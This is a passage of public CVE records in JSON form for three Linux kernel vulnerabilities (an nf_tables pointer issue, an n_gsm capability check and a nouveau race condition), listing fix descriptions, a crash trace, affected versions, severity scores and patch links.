"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-229",
"description": "Improper Handling of Values",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-20T18:09:28.624Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0607"
},
{
"name": "RHBZ#2258635",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258635"
},
{
"url": "https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-01-16T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2024-01-16T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: nf_tables: pointer math issue in nft_byteorder_eval()",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, it is possible to prevent the affected code from being loaded by blacklisting the kernel netfilter module. \n\nFor instructions relating to how to blacklist a kernel module refer to: https://access.redhat.com/solutions/41278"
}
],
"x_redhatCweChain": "CWE-229: Improper Handling of Values"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-0607",
"datePublished": "2024-01-18T15:41:14.425Z",
"dateReserved": "2024-01-16T16:45:59.397Z",
"dateUpdated": "2025-11-20T18:09:28.624Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52880 (GCVE-0-2023-52880)
Vulnerability from cvelistv5
Published
2024-05-24 15:33
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc
Any unprivileged user can attach N_GSM0710 ldisc, but it requires
CAP_NET_ADMIN to create a GSM network anyway.
Require initial namespace CAP_NET_ADMIN to do that.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52880",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T19:10:27.057428Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:31.686Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:18:41.167Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d303dee473ba3529d75b63491e9963342107bed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a529c9023a197ab3bf09bb95df32a3813f7ba58"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ada28eb4b9561aab93942f3224a2e41d76fe57fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b85977977cbd120591b23c2450e90a5806a7167"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/67c37756898a5a6b2941a13ae7260c89b54e0d88"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/n_gsm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7d303dee473ba3529d75b63491e9963342107bed",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7a529c9023a197ab3bf09bb95df32a3813f7ba58",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ada28eb4b9561aab93942f3224a2e41d76fe57fa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2b85977977cbd120591b23c2450e90a5806a7167",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "67c37756898a5a6b2941a13ae7260c89b54e0d88",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/n_gsm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.6",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc\n\nAny unprivileged user can attach N_GSM0710 ldisc, but it requires\nCAP_NET_ADMIN to create a GSM network anyway.\n\nRequire initial namespace CAP_NET_ADMIN to do that."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:08.398Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7d303dee473ba3529d75b63491e9963342107bed"
},
{
"url": "https://git.kernel.org/stable/c/7a529c9023a197ab3bf09bb95df32a3813f7ba58"
},
{
"url": "https://git.kernel.org/stable/c/ada28eb4b9561aab93942f3224a2e41d76fe57fa"
},
{
"url": "https://git.kernel.org/stable/c/2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a"
},
{
"url": "https://git.kernel.org/stable/c/2b85977977cbd120591b23c2450e90a5806a7167"
},
{
"url": "https://git.kernel.org/stable/c/67c37756898a5a6b2941a13ae7260c89b54e0d88"
}
],
"title": "tty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52880",
"datePublished": "2024-05-24T15:33:17.439Z",
"dateReserved": "2024-05-21T15:35:00.781Z",
"dateUpdated": "2025-05-04T07:45:08.398Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26984 (GCVE-0-2024-26984)
Vulnerability from cvelistv5
Published
2024-05-01 05:27
Modified
2025-11-04 17:15
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nouveau: fix instmem race condition around ptr stores
Running a lot of VK CTS in parallel against nouveau, once every
few hours you might see something like this crash.
BUG: kernel NULL pointer dereference, address: 0000000000000008
PGD 8000000114e6e067 P4D 8000000114e6e067 PUD 109046067 PMD 0
Oops: 0000 [#1] PREEMPT SMP PTI
CPU: 7 PID: 53891 Comm: deqp-vk Not tainted 6.8.0-rc6+ #27
Hardware name: Gigabyte Technology Co., Ltd. Z390 I AORUS PRO WIFI/Z390 I AORUS PRO WIFI-CF, BIOS F8 11/05/2021
RIP: 0010:gp100_vmm_pgt_mem+0xe3/0x180 [nouveau]
Code: c7 48 01 c8 49 89 45 58 85 d2 0f 84 95 00 00 00 41 0f b7 46 12 49 8b 7e 08 89 da 42 8d 2c f8 48 8b 47 08 41 83 c7 01 48 89 ee <48> 8b 40 08 ff d0 0f 1f 00 49 8b 7e 08 48 89 d9 48 8d 75 04 48 c1
RSP: 0000:ffffac20c5857838 EFLAGS: 00010202
RAX: 0000000000000000 RBX: 00000000004d8001 RCX: 0000000000000001
RDX: 00000000004d8001 RSI: 00000000000006d8 RDI: ffffa07afe332180
RBP: 00000000000006d8 R08: ffffac20c5857ad0 R09: 0000000000ffff10
R10: 0000000000000001 R11: ffffa07af27e2de0 R12: 000000000000001c
R13: ffffac20c5857ad0 R14: ffffa07a96fe9040 R15: 000000000000001c
FS: 00007fe395eed7c0(0000) GS:ffffa07e2c980000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000008 CR3: 000000011febe001 CR4: 00000000003706f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
...
? gp100_vmm_pgt_mem+0xe3/0x180 [nouveau]
? gp100_vmm_pgt_mem+0x37/0x180 [nouveau]
nvkm_vmm_iter+0x351/0xa20 [nouveau]
? __pfx_nvkm_vmm_ref_ptes+0x10/0x10 [nouveau]
? __pfx_gp100_vmm_pgt_mem+0x10/0x10 [nouveau]
? __pfx_gp100_vmm_pgt_mem+0x10/0x10 [nouveau]
? __lock_acquire+0x3ed/0x2170
? __pfx_gp100_vmm_pgt_mem+0x10/0x10 [nouveau]
nvkm_vmm_ptes_get_map+0xc2/0x100 [nouveau]
? __pfx_nvkm_vmm_ref_ptes+0x10/0x10 [nouveau]
? __pfx_gp100_vmm_pgt_mem+0x10/0x10 [nouveau]
nvkm_vmm_map_locked+0x224/0x3a0 [nouveau]
Adding any sort of useful debug usually makes it go away, so I hand
wrote the function in a line, and debugged the asm.
Every so often pt->memory->ptrs is NULL. This ptrs ptr is set in
the nv50_instobj_acquire called from nvkm_kmap.
If Thread A and Thread B both get to nv50_instobj_acquire around
the same time, and Thread A hits the refcount_set line, and in
lockstep thread B succeeds at refcount_inc_not_zero, there is a
chance the ptrs value won't have been stored since refcount_set
is unordered. Force a memory barrier here, I picked smp_mb, since
we want it on all CPUs and it's write followed by a read.
v2: use paired smp_rmb/smp_wmb.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: be55287aa5ba6895e9d4d3ed2f08a1be7a065957 Version: be55287aa5ba6895e9d4d3ed2f08a1be7a065957 Version: be55287aa5ba6895e9d4d3ed2f08a1be7a065957 Version: be55287aa5ba6895e9d4d3ed2f08a1be7a065957 Version: be55287aa5ba6895e9d4d3ed2f08a1be7a065957 Version: be55287aa5ba6895e9d4d3ed2f08a1be7a065957 Version: be55287aa5ba6895e9d4d3ed2f08a1be7a065957 Version: be55287aa5ba6895e9d4d3ed2f08a1be7a065957 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "bba8ec5e9b16",
"status": "affected",
"version": "be55287aa5ba",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "1bc4825d4c3e",
"status": "affected",
"version": "be55287aa5ba",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "13d76b2f443d",
"status": "affected",
"version": "be55287aa5ba",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3ab056814cd8",
"status": "affected",
"version": "be55287aa5ba",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ad74d208f213",
"status": "affected",
"version": "be55287aa5ba",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "a019b44b1bc6",
"status": "affected",
"version": "be55287aa5ba",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "21ca9539f093",
"status": "affected",
"version": "be55287aa5ba",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "fff1386cc889",
"status": "affected",
"version": "be55287aa5ba",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.20",
"status": "unaffected",
"version": "4.19.313",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.5",
"status": "unaffected",
"version": "5.4.275",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.16",
"status": "unaffected",
"version": "5.15.157",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.2",
"status": "unaffected",
"version": "6.1.88",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.7",
"status": "unaffected",
"version": "6.6.29",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.9",
"status": "unaffected",
"version": "6.8.8",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:4.15:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.15"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.11",
"status": "unaffected",
"version": "5.10.216",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26984",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-05T20:59:23.585345Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-05T20:59:40.867Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:15:10.866Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bba8ec5e9b16649d85bc9e9086bf7ae5b5716ff9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1bc4825d4c3ec6abe43cf06c3c39d664d044cbf7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13d76b2f443dc371842916dd8768009ff1594716"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ab056814cd8ab84744c9a19ef51360b2271c572"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad74d208f213c06d860916ad40f609ade8c13039"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a019b44b1bc6ed224c46fb5f88a8a10dd116e525"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21ca9539f09360fd83654f78f2c361f2f5ddcb52"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fff1386cc889d8fb4089d285f883f8cba62d82ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bba8ec5e9b16649d85bc9e9086bf7ae5b5716ff9",
"status": "affected",
"version": "be55287aa5ba6895e9d4d3ed2f08a1be7a065957",
"versionType": "git"
},
{
"lessThan": "1bc4825d4c3ec6abe43cf06c3c39d664d044cbf7",
"status": "affected",
"version": "be55287aa5ba6895e9d4d3ed2f08a1be7a065957",
"versionType": "git"
},
{
"lessThan": "13d76b2f443dc371842916dd8768009ff1594716",
"status": "affected",
"version": "be55287aa5ba6895e9d4d3ed2f08a1be7a065957",
"versionType": "git"
},
{
"lessThan": "3ab056814cd8ab84744c9a19ef51360b2271c572",
"status": "affected",
"version": "be55287aa5ba6895e9d4d3ed2f08a1be7a065957",
"versionType": "git"
},
{
"lessThan": "ad74d208f213c06d860916ad40f609ade8c13039",
"status": "affected",
"version": "be55287aa5ba6895e9d4d3ed2f08a1be7a065957",
"versionType": "git"
},
{
"lessThan": "a019b44b1bc6ed224c46fb5f88a8a10dd116e525",
"status": "affected",
"version": "be55287aa5ba6895e9d4d3ed2f08a1be7a065957",
"versionType": "git"
},
{
"lessThan": "21ca9539f09360fd83654f78f2c361f2f5ddcb52",
"status": "affected",
"version": "be55287aa5ba6895e9d4d3ed2f08a1be7a065957",
"versionType": "git"
},
{
"lessThan": "fff1386cc889d8fb4089d285f883f8cba62d82ce",
"status": "affected",
"version": "be55287aa5ba6895e9d4d3ed2f08a1be7a065957",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnouveau: fix instmem race condition around ptr stores\n\nRunning a lot of VK CTS in parallel against nouveau, once every\nfew hours you might see something like this crash.\n\nBUG: kernel NULL pointer dereference, address: 0000000000000008\nPGD 8000000114e6e067 P4D 8000000114e6e067 PUD 109046067 PMD 0\nOops: 0000 [#1] PREEMPT SMP PTI\nCPU: 7 PID: 53891 Comm: deqp-vk Not tainted 6.8.0-rc6+ #27\nHardware name: Gigabyte Technology Co., Ltd. Z390 I AORUS PRO WIFI/Z390 I AORUS PRO WIFI-CF, BIOS F8 11/05/2021\nRIP: 0010:gp100_vmm_pgt_mem+0xe3/0x180 [nouveau]\nCode: c7 48 01 c8 49 89 45 58 85 d2 0f 84 95 00 00 00 41 0f b7 46 12 49 8b 7e 08 89 da 42 8d 2c f8 48 8b 47 08 41 83 c7 01 48 89 ee \u003c48\u003e 8b 40 08 ff d0 0f 1f 00 49 8b 7e 08 48 89 d9 48 8d 75 04 48 c1\nRSP: 0000:ffffac20c5857838 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: 00000000004d8001 RCX: 0000000000000001\nRDX: 00000000004d8001 RSI: 00000000000006d8 RDI: ffffa07afe332180\nRBP: 00000000000006d8 R08: ffffac20c5857ad0 R09: 0000000000ffff10\nR10: 0000000000000001 R11: ffffa07af27e2de0 R12: 000000000000001c\nR13: ffffac20c5857ad0 R14: ffffa07a96fe9040 R15: 000000000000001c\nFS: 00007fe395eed7c0(0000) GS:ffffa07e2c980000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000008 CR3: 000000011febe001 CR4: 00000000003706f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\n...\n\n ? gp100_vmm_pgt_mem+0xe3/0x180 [nouveau]\n ? gp100_vmm_pgt_mem+0x37/0x180 [nouveau]\n nvkm_vmm_iter+0x351/0xa20 [nouveau]\n ? __pfx_nvkm_vmm_ref_ptes+0x10/0x10 [nouveau]\n ? __pfx_gp100_vmm_pgt_mem+0x10/0x10 [nouveau]\n ? __pfx_gp100_vmm_pgt_mem+0x10/0x10 [nouveau]\n ? __lock_acquire+0x3ed/0x2170\n ? __pfx_gp100_vmm_pgt_mem+0x10/0x10 [nouveau]\n nvkm_vmm_ptes_get_map+0xc2/0x100 [nouveau]\n ? __pfx_nvkm_vmm_ref_ptes+0x10/0x10 [nouveau]\n ? __pfx_gp100_vmm_pgt_mem+0x10/0x10 [nouveau]\n nvkm_vmm_map_locked+0x224/0x3a0 [nouveau]\n\nAdding any sort of useful debug usually makes it go away, so I hand\nwrote the function in a line, and debugged the asm.\n\nEvery so often pt-\u003ememory-\u003eptrs is NULL. This ptrs ptr is set in\nthe nv50_instobj_acquire called from nvkm_kmap.\n\nIf Thread A and Thread B both get to nv50_instobj_acquire around\nthe same time, and Thread A hits the refcount_set line, and in\nlockstep thread B succeeds at refcount_inc_not_zero, there is a\nchance the ptrs value won\u0027t have been stored since refcount_set\nis unordered. Force a memory barrier here, I picked smp_mb, 